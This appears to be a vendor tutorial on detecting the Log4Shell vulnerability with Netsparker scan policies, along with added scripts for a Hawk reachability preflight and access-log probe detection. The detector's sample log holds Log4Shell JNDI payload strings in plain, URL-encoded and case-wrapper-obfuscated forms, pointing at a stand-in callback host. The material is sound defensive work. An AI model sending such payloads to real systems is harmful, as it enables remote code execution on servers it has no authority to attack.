
Detecting Log4j vulnerability with Netsparker

Netsparker can detect whether you have Java applications vulnerable to remote code execution attacks targeting the Log4j library.

  • Thousands of Java applications across the world are wide open to remote code execution attacks targeting the Log4j library.
  • A fix is already available, so the recommended course of action is to update to Log4j 2.17.0 (or newer) immediately.

For further information about Log4j, see Why Log4Shell could be the worst software vulnerability ever and Log4J FAQ.

To get the latest news and resources from Invicti on the Log4j crisis, visit Log4j vulnerability resource center.

To detect whether applications in your environment are affected by the Log4j vulnerability, you can use Netsparker Enterprise or Netsparker Standard.

This tutorial provides a step-by-step guide on how to identify the Log4j vulnerability with Netsparker Enterprise and with Netsparker Standard.

Log4j detection relies on out-of-band callbacks, so the server on which Log4j runs must be able to reach r87.me (Netsparker's Hawk server) or your internal Hawk instance, depending on your deployment. For further information about Netsparker Hawk, see How Netsparker Hawk Finds Vulnerabilities.

Using Netsparker Enterprise On-Premises? If you installed Internal Hawk, enter its address in the scan policy. Otherwise, whitelist r87.me.

Detecting the Log4j vulnerability with Netsparker Enterprise

To detect the Log4j vulnerability with Netsparker Enterprise, follow these steps:

  1. Configure a scan policy for Log4j
  2. Scan your application with the scan policy created in Step 1
  3. Review the scan result

Using internal agents? For the agent to reach Netsparker's Hawk server (r87.me) and detect out-of-band vulnerabilities, allow the following outbound traffic from the agent server: TCP 80 and 443, and UDP 53.
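Before launching a scan it is worth confirming from the agent (or Log4j) host itself that the Hawk requirements above are met. The following preflight script is an added example, not part of Netsparker; it assumes only what this page states (r87.me, TCP 80 and 443, and name resolution over UDP 53) and lets you swap in an internal Hawk address instead.

```python
"""Preflight check for out-of-band (Hawk) reachability.

Added example (not part of Netsparker). Assumes the requirements stated on
this page: the scanning/agent host must reach r87.me on TCP 80 and 443 and
be able to resolve names over UDP 53. HAWK_HOST can be replaced by an
internal Hawk address.
"""
import socket
from typing import Dict, Iterable

HAWK_HOST = "r87.me"            # public Hawk server named on this page
REQUIRED_TCP_PORTS = (80, 443)  # from the page's whitelist guidance


def resolves(host: str) -> bool:
    """True if the name resolves. For a typical resolver this exercises the
    UDP 53 path; IP literals resolve trivially."""
    try:
        socket.getaddrinfo(host, None)
        return True
    except socket.gaierror:
        return False


def tcp_port_open(host: str, port: int, timeout: float = 3.0) -> bool:
    """True if a TCP connection to host:port completes within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:          # refused, timed out, unreachable, or unresolvable
        return False


def preflight(host: str = HAWK_HOST,
              tcp_ports: Iterable[int] = REQUIRED_TCP_PORTS,
              timeout: float = 3.0) -> Dict[str, bool]:
    """Run every check and return a name -> pass/fail map."""
    results = {"dns": resolves(host)}
    for port in tcp_ports:
        # If the name does not resolve the TCP probes cannot pass; skip them.
        results[f"tcp/{port}"] = results["dns"] and tcp_port_open(host, port, timeout)
    return results


def all_passed(results: Dict[str, bool]) -> bool:
    """Convenience for scripting: exit non-zero when any check failed."""
    return all(results.values())


if __name__ == "__main__":
    import sys
    res = preflight()
    for name, ok in res.items():
        print(f"{name:10} {'OK' if ok else 'FAIL'}")
    sys.exit(0 if all_passed(res) else 1)
```

Run it on the agent server (or pass your internal Hawk address as `host`) before the scan; a failing `dns` row points at the UDP 53 rule, a failing `tcp/443` row at the egress firewall. A successful TCP connect does not prove a proxy will forward the callback, so treat the script as a quick first check rather than a full validation.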

Step 1. Configuring a scan policy for Log4j

You can configure a scan policy to run a security check to detect the Log4j vulnerability in your environment.

How to configure a scan policy for Log4j
  1. Log in to Netsparker Enterprise.
  2. From the main menu, select Policies > New Scan Policy.
  3. On the New Scan Policy page, enter a name and a description for your new scan policy.
  4. From the Security Checks section, select Code Evaluation > Code Evaluation (Out of Band).
  5. Enter Log4j to filter the security checks, and make sure the Log4j checks are selected.
  6. From the Attacking section, select Attack Referer Header and Attack User-Agent Header.
  7. From the Attacking section, deselect Optimize Header Attacks.
  8. From the Header section, configure the HTTP Headers attack settings according to your environment.
  9. Select Save.

Step 2. Scanning your application with the custom scan policy

After you create a custom scan policy that includes the Log4j checks, you can now launch a scan to detect whether you are vulnerable to the Log4j attacks.

How to scan your application with the custom scan policy

Before scanning a website in Netsparker Enterprise, make sure you have added it (see Adding a website in Netsparker Enterprise).

  1. Log in to Netsparker Enterprise.
  2. From the main menu, select Scans > New Scan.
  3. In the Target URL field, enter the URL.
  4. From the Scan Policy drop-down, select the custom policy created in Step 1.
  5. Select Launch to scan.

How to run a group scan with the custom scan policy
  1. Log in to Netsparker Enterprise.
  2. From the main menu, select Scans > New Group Scan.
  3. On the New Website Group Scan page, select a Website Group from the drop-down menu.
  4. From the Scan Policy drop-down, select the custom scan policy created in Step 1.
  5. Select Launch to scan.

Step 3. Reviewing scan result

When you launch the scan, Netsparker Enterprise crawls and attacks your web application to identify the Log4j vulnerability.

When the scan completes, Netsparker Enterprise sends an email containing a link to the report. If you have not configured email notifications, log in to Netsparker Enterprise and open the report there.

How to access your scan report
  1. Log in to Netsparker Enterprise.
  2. From the main menu, select Scans > Recent Scans.
  3. Next to the relevant scan, select Report.
  4. On the Scan Summary page, scroll down to the Technical Report section to view your scan report.

Detecting the Log4j vulnerability with Netsparker Standard

To detect the Log4j vulnerability with Netsparker Standard, follow these steps:

  1. Update Netsparker Standard to the newest version
  2. Configure a scan policy for Log4j
  3. Scan your application with the scan policy created in the 2nd step
  4. Review the scan result

Step 1. Updating Netsparker Standard to the newest version

You need to update Netsparker Standard to the newest version so that it can detect the Log4j vulnerability in your application.

If you already have Netsparker Standard 6.3.033782, skip this step.

Installing Netsparker Standard for the first time? For further information, see Installing Netsparker Standard.

Downloading Netsparker Standard with your Enterprise license? See Downloading Netsparker Standard from Netsparker Enterprise.

How to update Netsparker Standard
  1. Open Netsparker Standard.
  2. At the prompt, select Download & Install.

You can also check for updates manually: from the Help tab, select Check for Updates (or press CTRL+U). This checks whether a new version of Netsparker Standard has been released.

Netsparker downloads the update and applies it when Netsparker Standard restarts.

Step 2. Configuring a scan policy for Log4j

With the newest version installed, you can configure a scan policy that runs the security checks for the Log4j vulnerability in your environment.

How to configure a scan policy for Log4j
  1. Open Netsparker Standard.
  2. From the main ribbon, select Home > Scan Policy Editor.
  3. Select New.
  4. Enter a name for your new scan policy. (This tutorial uses Log4j Policy as the custom scan policy name.)
  5. From the Security Checks, double-click Code Evaluation, then select Code Evaluation (Out of Band).
  6. In the Security Checks section, enter Log4j to filter the checks.
  7. Select (Java) Log4j RCE and (Java) Log4j RCE Encoded.
  8. Select Apply.
  9. From the Attacking section, select Attack Referer Header and Attack User-Agent Header.
  10. From the Attacking section, deselect Optimize Header Attacks.
  11. From the Header section, configure the HTTP Headers attack settings according to your environment.
  12. Select Apply, then OK.
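The policy above, like its Netsparker Enterprise counterpart in Step 1 of the previous section, sends its Log4j probes in the Referer and User-Agent headers, and the "Encoded" check variant obfuscates them. Those probes land in the target's web server access log, so the defender reviewing a scan can confirm from the server side that the headers were attacked, and reuse the same parser to spot probes that did not come from the scanner. The script below is an added example and not Netsparker code; the combined-format log lines and the callback host oob.example are constructed for it.

```python
"""Find Log4Shell (JNDI lookup) probes in web server access logs.

Added example; it is not Netsparker code. The scan policy on this page puts
Log4j probes into the Referer and User-Agent headers, and its "Encoded"
variant obfuscates them, so this parser normalises those two fields (plus the
request line) before looking for a JNDI lookup. The log lines and the
callback host oob.example are constructed for the example.
"""
import re
import urllib.parse
from collections import Counter
from typing import Dict, Iterable, List

# Apache/Nginx "combined" format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# ${lower:x} / ${upper:x} wrappers that split the word "jndi" across lookups
CASE_WRAPPER_RE = re.compile(r'\$\{(?:lower|upper):([^}]*)\}', re.IGNORECASE)
# A JNDI lookup after normalisation; the scheme (ldap, rmi, dns, ...) is irrelevant for flagging
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def normalize(value: str) -> str:
    """Undo URL encoding (a few rounds) and case-wrapper nesting, then lowercase."""
    s, prev = value, None
    for _ in range(3):                      # bounded: never loop forever on hostile input
        if s == prev:
            break
        prev, s = s, urllib.parse.unquote(s)
    prev = None
    while s != prev:                        # wrappers may nest, so repeat to a fixed point
        prev, s = s, CASE_WRAPPER_RE.sub(lambda m: m.group(1), s)
    return s.lower()


def find_log4shell_probes(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one hit per (line, field) whose normalised value contains a JNDI lookup."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue                        # not combined format; a real deployment would report this
        for field in ("ua", "referer", "request"):
            if JNDI_RE.search(normalize(m.group(field))):
                hits.append({"ip": m.group("ip"), "time": m.group("time"),
                             "field": field, "raw": m.group(field)})
    return hits


def sources(hits: Iterable[Dict[str, str]]) -> Counter:
    """Hits per client IP: separates your own scanner's address from anyone else probing."""
    return Counter(h["ip"] for h in hits)


# Constructed sample log: one normal request, then three probes of increasing obfuscation.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:14:02:10 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://oob.example/a}"',
    '203.0.113.5 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 512 "%24%7Bjndi%3Aldap%3A%2F%2Foob.example%2Fb%7D" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:14:02:13 +0000] "GET /login HTTP/1.1" 200 512 "${${lower:j}${upper:n}di:ldap://oob.example/c}" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = find_log4shell_probes(SAMPLE_LOG)
    for h in found:
        print(f"{h['time']} {h['ip']} {h['field']}: {h['raw']}")
    print(sources(found))
```

Feed the function your real access log (one line per entry) and compare `sources()` against the scanner's address: hits from the scanner confirm the header attacks reached the application, and hits from any other address are probes worth an incident ticket. Only requests that reach the web tier are visible here; a vulnerable component fed by other inputs is exactly what the out-of-band scan, not the log review, is for.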

Step 3. Scanning your application with the custom scan policy

After you have created a custom scan policy to detect the Log4j vulnerability in your environment, you can run a scan.

How to scan your application to detect the Log4j vulnerability
  1. Open Netsparker Standard.
  2. From the main ribbon, select New.
  3. In Start a New Website or Web Service Scan, enter your website URL.
  4. From the Scan Policy drop-down, select your custom scan policy.
  5. Select Start Scan to launch the scan.

Netsparker Standard starts scanning your web application to detect whether the Log4j vulnerability is present in your environment.

Step 4. Reviewing scan result

When Netsparker completes the scan, you can see the result in the Issues and Sitemap panels. The Issues panel lists all detected vulnerabilities and other issues.
